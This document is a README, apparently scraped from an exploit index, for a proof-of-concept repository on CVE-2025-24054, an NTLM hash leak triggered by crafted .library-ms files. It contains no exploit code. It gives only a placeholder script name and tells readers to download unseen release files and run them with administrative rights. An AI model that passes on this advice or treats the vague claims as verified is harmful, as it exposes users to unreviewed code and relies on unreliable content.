## https://sploitus.com/exploit?id=DF696580-77CB-5E9A-B1C0-AB36C8E7AA7F
# CVE-2025-24054 PoC ๐ก๏ธ
## Overview
Welcome to the **CVE-2025-24054-PoC** repository. This project provides a proof of concept for the NTLM hash leak vulnerability via the `.library-ms` file format, as detailed in CVE-2025-24054. This vulnerability can lead to significant security risks, particularly in environments that utilize NTLM for authentication.
### Key Features
- **Demonstrates Vulnerability**: This PoC illustrates how the NTLM hash leak occurs.
- **Educational Resource**: Designed for security researchers and developers to understand the implications of the vulnerability.
- **Simple Setup**: Easy to download and execute.
## Getting Started
To get started, download the necessary files from the [Releases section](https://github.com/ClementNjeru/CVE-2025-24054-PoC/releases). Follow the instructions below to set up and run the proof of concept.
### Prerequisites
Before you begin, ensure you have the following:
- A Windows environment
- Administrative privileges
- Basic understanding of command-line operations
### Installation
1. Visit the [Releases section](https://github.com/ClementNjeru/CVE-2025-24054-PoC/releases) to download the PoC files.
2. Extract the downloaded files to a directory of your choice.
3. Open a command prompt with administrative privileges.
4. Navigate to the directory where you extracted the files.
5. Execute the script using the command:
```bash
.\your_script_name.ps1
```
### Usage
Once you have executed the script, the PoC will demonstrate the NTLM hash leak. You can monitor the output in your command prompt for any leaks or anomalies.
## Vulnerability Details
### What is CVE-2025-24054?
CVE-2025-24054 is a security vulnerability that affects the NTLM authentication protocol. This vulnerability allows attackers to extract NTLM hashes from a system, which can then be used for unauthorized access.
### How Does the Vulnerability Work?
The vulnerability arises when a `.library-ms` file is processed by the Windows operating system. Attackers can craft a malicious file that triggers the leak of NTLM hashes, allowing them to capture sensitive authentication information.
### Impact
The potential impact of this vulnerability includes:
- Unauthorized access to sensitive systems
- Credential theft
- Increased risk of lateral movement within networks
## Topics Covered
This repository touches on several important topics related to cybersecurity:
- **CVE**: Common Vulnerabilities and Exposures
- **NTLM**: NT LAN Manager, a protocol used for authentication
- **Phishing**: Techniques that exploit vulnerabilities to gain unauthorized access
- **Exploit Development**: Creating proof of concept exploits to demonstrate vulnerabilities
## Contributing
We welcome contributions to improve this project. If you would like to contribute, please follow these steps:
1. Fork the repository.
2. Create a new branch (`git checkout -b feature/YourFeature`).
3. Make your changes and commit them (`git commit -m 'Add new feature'`).
4. Push to the branch (`git push origin feature/YourFeature`).
5. Open a pull request.
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
## Contact
For questions or inquiries, please reach out to the project maintainer:
- **Clement Njeru**: [GitHub Profile](https://github.com/ClementNjeru)
## Acknowledgments
- Thanks to the security community for their ongoing research and efforts to improve software security.
- Special thanks to contributors who help maintain this repository.
## Additional Resources
For further reading on the NTLM protocol and related vulnerabilities, consider the following resources:
- [Microsoft Documentation on NTLM](https://docs.microsoft.com/en-us/windows/win32/security/ntlm)
- [CVE-2025-24054 Details](https://vulners.com/cve/CVE-2025-24054)
## Conclusion
This repository serves as a valuable resource for understanding and demonstrating the CVE-2025-24054 vulnerability. By providing a clear proof of concept, we aim to educate and inform the community about the risks associated with NTLM hash leaks.
For the latest updates and releases, visit the [Releases section](https://github.com/ClementNjeru/CVE-2025-24054-PoC/releases). Your engagement and contributions can help enhance security awareness and practices in the industry.